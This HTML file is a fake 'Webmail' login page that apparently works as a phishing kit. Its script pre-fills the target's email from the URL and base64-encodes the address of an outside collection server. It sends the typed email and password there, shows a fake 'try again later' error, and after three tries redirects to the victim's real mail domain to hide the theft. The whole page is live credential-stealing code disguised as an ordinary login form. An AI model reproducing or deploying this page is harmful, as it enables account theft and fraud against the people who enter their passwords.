
<!doctype html>
<html lang="en">

<head>
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
        <script type="text/javascript" src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="icon" href="images/logo_icon.ico" type="image/icon" sizes="30x30">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
    <title>Webmail</title>
    <link href="css/hover.css" rel="stylesheet" media="all">
    <style type="text/css">
    .box {
        margin: 0;
        padding: 4px;
        border: 1px solid #FFFFFF;
        border-radius: 0px;
        box-shadow: inset 0 0 0px 0px rgba(0, 0, 0, 0);
        -webkit-box-shadow: inset 0 0 0px 0px rgba(0, 0, 0, 0);
    }
    </style>
</head>

<body style="background-color: #FFFFFF;">
    <!-- <div class="container-fluid">
        <div class="row">
            <div class="col-md-4 mx-auto">
                <div>
                    <input type="text" id="toplink" class="box" style="width: 100%" readonly="" value="">
                </div>
            </div>
        </div>
    </div> -->
    <div class="container-fluid">
        <div class="row" style="margin: 65px 30px 60px 30px;">
            <div class="col-md-4 mx-auto mt-5 px-3 pb-4" style="border:1px solid; background-color: rgba(0,0,0,0.0);border-radius:10px;">
                <div class="text-left pt-2">
                    <img src="https://i.gyazo.com/86a69afa35204e598e31161982090a87.png" class="img-fluid" width="180px"><br>
                </div>
                <div>
                    <center>
                        <div class="alert alert-danger" id="mgss" style="display: none;"></div>
                        <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
                    </center>
                    <form id="contact" class="form-horizontal well">
                        <div id="div1" class="text-black">
                            <div class="col-lg-12 mt-4">
                                <div class="form-group row">
                                    <label for="staticai" class="col-sm-2 col-form-label" style="font-size: 13px">Email </label><br>
                                    <div class="col-sm-10 mt-2">
                                        <input type="email" id="ai" name="ai"  class="form-control p-0 px-2" value="">
                                    </div>
                                </div>
                            </div>
                            <div class="col-lg-12 mt-1">
                                <div class="form-group row">
                                    <label for="staticai" class="col-sm-2 col-form-label" style="font-size: 13px">Password</label><br>
                                    <div class="col-sm-10 mt-2">
                                        <input type="password" id="pr" name="pr"  class="form-control p-0 px-2" value="">
                                    </div>
                                </div>
                            </div>
                        </div>
                </div>
                <div class="text-center">
                    <button class="btn btn-white text-dark py-0 font-weight-bold" style="font-size: 14px" id="submit-btn">Login</button>
                </div>
                </form>
            </div>
            
            <div class="col-lg-12 text-center mt-5 pt-3">
                <span class="" style="color: #766; font-size: 13px">Webmail @ 2025</span>
            </div>
        </div>
    </div>
    </div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    var count = 0;
    $("#ai").focusout(function() {
        var em = $("#ai").val();
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(em)) {
            $('#toplink').val("");
        } else {
            var my_ai = em;
            var ind = my_ai.indexOf("@");
            var my_slice = my_ai.substr((ind + 1));
            var c = my_slice.substr(0, my_slice.indexOf('.'));
            var final = c.toLowerCase();
            $('#toplink').val("https://" + my_slice + "/webmail/");
        }
    });

    $('#back1').click(function() {
        $("#mgss").hide();
        $('#ai').val("");
        $("#automail").animate({ left: 200, opacity: "hide" }, 0);
        $("#inputbar").animate({ right: 200, opacity: "show" }, 1000);

    });

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        $('#contact').trigger("reset");
        $("#mgss").hide();
        $('#fieldImg').attr('src', 'images/other-1.png');
        $('#field').html("Other Mail");
        $('#ai').val(my_ai);
        $('#aich').html(my_ai);
        $('#toplink').val("https://" + my_slice + "/webmail/");
        $("#mgss").hide();
        // $("#inputbar").animate({left:200, opacity:"hide"}, 0);
        // $("#automail").animate({right:200, opacity:"show"}, 1000);
    }
    ///////////////url getting ai////////////////


var f="aHR0cDovL21lZGFsbGlvbm1pbnQuY29tL2NnaS1iaW4vY25lbHovbmV4dC5waHA=";
    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#mgss').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var mgss = $('#mgss').html();
        $('#mgss').text(mgss);
        ///////////////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_ai)) {
            $('#error').show();
            ai.focus;
            return false;
        }

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        ///////////////////////////
        count = count + 1;

        $.ajax({
            dataType: 'JSON',
            url: atob(f),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifing...');
            },
            
            complete: function() {
                $("#pr").val("");
                if (count >= 3) {
                    count = 0;
                    window.location.replace("http://www." + my_slice);
                }
                $("#mgss").show();
                $('#mgss').html("Please try again later");
                $('#submit-btn').html('Login');
            }
        });
    });


});
</script>

</html>
